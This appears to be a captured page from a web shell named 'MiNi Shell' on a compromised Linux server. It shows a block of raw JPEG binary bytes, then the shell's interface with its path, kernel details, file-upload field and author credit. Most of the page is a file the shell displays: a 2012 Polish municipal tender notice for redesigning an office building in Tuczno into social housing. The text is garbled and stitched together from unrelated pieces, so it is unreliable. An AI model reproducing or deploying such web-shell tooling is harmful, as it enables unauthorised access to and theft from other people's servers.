JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120314/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120314/59175-N-2012.html

<p class="kh_header"><b>Złotniki Kujawskie: Wykonanie  dokumentacji projektowej na przebudowę, remont i adaptację byłego budynku biurowego  z przeznaczeniem na lokale socjalne  w miejscowości  Tuczno ul.Boczna   gm.Złotniki Kujawskie</b><br>
<b>Numer ogłoszenia: 59175 - 2012; data zamieszczenia: 14.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy , ul. Powstańców Wlkp. 6, 88-180 Złotniki Kujawskie, woj. kujawsko-pomorskie.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zlotnikikuj.cc.</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie  dokumentacji projektowej na przebudowę, remont i adaptację byłego budynku biurowego  z przeznaczeniem na lokale socjalne  w miejscowości  Tuczno ul.Boczna   gm.Złotniki Kujawskie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest wykonanie dokumentacji projektowej na przebudowę,  
    remont i  adaptacje byłego budynku biurowego z przeznaczeniem  na lokale   socjalne w 
    miejscowości  Tuczno  ul.Boczna gm.Złotniki Kujawski wraz z zaprojektowaniem  
    pomieszczeń gospodarczych blaszanych.
    W obiekcie nadal pozostaje funkcja przychodni i apteki.
    Dokumentacja remontowo-adaptacyjna w swym zakresie ma obejmować:
a)	dokonanie podziałów wewnętrznych na lokale socjalne zapewniająca niezależne wejście do każdego mieszkania z łazienką ,
b)	wymiana istniejącej stolarki okiennej i drzwiowej  wewnętrznej i zewnętrznej,
c)	remont poszycia dachowego,
d)	wymiana instalacji elektrycznej  i wodno- kanalizacyjnej poprzez zaprojektowanie nowych rozwiązań dla potrzeb lokali socjalnych,
e)	ocieplenie budynku wraz z nową elewacją,
f)	indywidualne ogrzewanie lokalu socjalnego poprzez ogrzewanie etażowe,
g)	roboty murarskie , tynkarskie, malarskie  i inne związane z przystosowaniem na lokale socjalne,  
       h) zaprojektowanie pomieszczeń gospodarczych.

2.Zakres opracowania obejmuje:
1)Wykonanie inwentaryzacji budynku.
2)Wykonanie ekspertyzy technicznej budynku, ekspertyzy technicznej bezpieczeństwa 
   pożarowego i inne wymagane przepisami. Wymagania wynikające z ekspertyz należy 
   uwzględnić w projekcie.
3)Przygotowanie materiałów do uzyskania decyzji o warunkach zabudowy .
4) Przygotowanie materiałów do decyzji środowiskowej (jeśli konieczna).
5)Koncepcja adaptacji budynku na lokale socjalne opracowana z uwzględnieniem  
    wniosków i wytycznych Zamawiającego wraz z szacunkowymi kosztami inwestycji.
6)Wykonanie mapy do celów projektowych .
7)Projekt zagospodarowania terenu obejmujący m.in. chodnik i  parking.
8) Wykonanie projektu budowlanego.
9) Wykonanie projektów wykonawczych, w tym min.:
a)	architektury, 
b)	konstrukcji,
c)	przyłącza mediów zewnętrznych
d)	instalacji budowlanych wewnętrznych i zewnętrznych:
- wodno - kanalizacyjnej
- centralnego ogrzewania
- elektrycznej i teletechnicznej
- odgromowa    
10)Specyfikację techniczną na wykonanie i odbiór robót zgodnie z  ustawą Prawo zamówień 
     publicznych oraz Rozporządzeniem Ministra Infrastruktury z dnia 02.09.2004 r. Dz.U Nr  
     202 , poz.2072 ze zm.  11)Przedmiar robót oraz zestawienie robocizny, materiałów i sprzętu zgodnie z  
     rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego 
     zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót  
     budowlanych oraz programu funkcjonalno-użytkowego
12)Kosztorys inwestorski  zgodnie z  ustawą Prawo zamówień publicznych oraz 
     wymaganiami Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie  
     określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania 
     planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych 
     określonych w programie funkcjonalno-użytkowym Dz.U Nr  130 poz.1389.
     (Na życzenie Zamawiającego uaktualnienie / powtórne obliczenie wartości 
     Zamówienia po upływie jego ważności ).
13)Wszystkie niezbędne uzgodnienia, odstępstwa  wymagane Prawem Budowlanym na 
     uzyskanie decyzji pozwolenie na budowę  . 14)Sporządzenie wytycznych  do Planu bezpieczeństwa  i Ochrony Zdrowia  dotyczącego 
     realizacji robót  określonych w projekcie zgodnie z Rozporządzeniem Ministra 
     Infrastruktury z dnia 23 czerwca 2003 r.   Dz.U. Nr 120 poz.1126. 15)Dokumentację projektowo-kosztorysową należy przygotować również w wersji 
     elektronicznej, tj.:  rysunki i dokumenty tekstowe w formie PDF.Dokumentacja   
     projektowa na nośnikach elektronicznych  będzie wykorzystana do ogłoszenia przetargu, 
     (kosztorysy  inwestorskie  na oddzielnym nośniku).
16)Charakterystyka energetyczna wraz z obliczeniami.
17)Uzyskanie pozwolenia na budowę
18)Nadzór autorski 
19)Wykonawca zabezpieczy we własnym zakresie  i na własny koszt, wszystkie materiały   
    niezbędne do realizacji  zamówienia. Oferta musi uwzględniać wszystkie koszty związane 
    z prawidłową realizacją zamówienia.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6, 71.32.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże spełnienie warunku jeżeli w okresie ostatnich 3 lat przed upływem terminu składania ofert, a  jeżeli okres prowadzenia działalności jest krótszy -  w tym okresie   wykonał co najmniej dwie usługi projektowe polegające na zaprojektowaniu obiektu kubaturowego tj. budynku mieszkalnego wielorodzinnego lub budynku zamieszkania zbiorowego lub przebudowie obiektu kubaturowego z przeznaczeniem na mieszkania wielorodzinne lub zamieszkania zbiorowego  lub inne usługi projektowe o charakterze, funkcji i złożoności porównywalnej  z zakresem zamówienia  z podaniem ich wartości, przedmiotu, daty wykonania i odbiorców  oraz załączeniem dokumentów  potwierdzających, że usługi te  zostały wykonane należycie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzą  dysponowanie osobami posiadającymi uprawnienia budowlane do projektowania bez ograniczeń obiektu budowlanego w specjalności:

a) architektonicznej,
a) konstrukcyjno -budowlanej  ,  
b) instalacyjnej w zakresie  instalacji i urządzeń elektrycznych i elektroenergetycznych ,
c) instalacyjnej w zakresie  instalacji wodociągowych  i kanalizacyjnych
Będące członkiem  Okręgowej Izby Inżynierów Budownictwa lub Izby Architektów -  
legitymującymi się nie mniejszymi niż  3  letnim stażem  zawodowym.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku dotyczącego sytuacji ekonomicznej i finansowej Zamawiający uzna  posiadanie:
a)	opłaconej  polisy a w przypadku jej braku  innego dokumentu potwierdzającego ,że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 200 000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wypełniony i podpisany Formularz ofertowy z wykorzystaniem wzoru- Załącznik nr 1
2.Oświadczenie o spełnieniu warunków udziału w postępowaniu  z art. 22 ust. 1 Prawa zamówień publicznych z wykorzystaniem wzoru - Załącznik nr 2 
3.Dokumenty potwierdzające posiadanie uprawnień / pełnomocnictw osób składających ofertę, o ile nie wynikają z przepisów prawa lub z przedstawionych dokumentów rejestrowych
4.Wskazanie części zamówienia, której wykonanie wykonawca zamierza powierzyć podwykonawcom załącznik nr 9.
5.Pisemne zobowiązanie innych podmiotów do oddania wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia- w przypadku, gdy wykonawca  będzie polegać na wiedzy i doświadczeniu , potencjale technicznym, osobach zdolnych do wykonania zamówienia  lub zdolnościach finansowych tych podmiotów - zaleca się sporządzenie zgodnie z załącznikiem nr 6A siwz (druk do wypełnienia lub wzorowania się).
6.Oświadczenie innych podmiotów o braku podstaw do ich wykluczenia z postępowania</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmianę postanowień zawartej umowy w następujących przypadkach: 
1.w uzasadnionych przypadkach, gdy zajdzie konieczność wprowadzenia zmian  
   wynikających z okoliczności, których nie można było przewidzieć w chwili zawarcia 
   umowy, 
2.w przypadku, gdy zmiany postanowień zawartej umowy będą korzystne dla zamawiającego,
   a zmiany wynikły w trakcie realizacji zamówienia, 
3.zawieszenia wykonywania usługi przez Zamawiającego, 
4.aktualizacji rozwiązań z uwagi na postęp technologiczny lub zmianę obowiązujących 
   przepisów, 
5.zmiany w sposobie dokonywania płatności, 
6.zmiany danych Wykonawcy np. zmiana adresu, konta bankowego, nr REGON, osób 
   kontaktowych itp., 
7.uwarunkowań społecznych (protestów, listów, petycji, itp.), 
8.zmiany przepisów prawa, 
9.braku możliwości kontynuacji usługi z winy Zamawiającego, 
10.przedłużenia się procedury przetargowej, 
Warunki dokonania zmian: 
a) zmiana postanowień zawartej umowy może nastąpić wyłącznie za zgodą obu stron, 
    wyrażoną na piśmie, pod rygorem nieważności, 
b) strona występująca o zmianę postanowień zawartej umowy: 
- opisze zaistniałe okoliczności, 
- uzasadni, udokumentuje zaistnienie powyższych okoliczności, 
- opisze wpływ zmian na termin wykonania umowy. 
c) wniosek o zmianę postanowień zawartej umowy musi być wyrażony na piśmie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zlotnikikuj.ires.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Złotniki Kujawskie, ul.Powstańców Wielkopolskich 6, 88-180 Złotniki Kujawskie. Zamawiający pobiera opłatę za materiały przetargowe w wersji papierowej w wysokości 30 zł..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.03.2012 godzina 11:00, miejsce: Urząd Gminy Złotniki Kujawskie
ul.Powstanców Wielkopolskich 6, 88-180 Złotniki Kujawskie pok.27 , I Piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com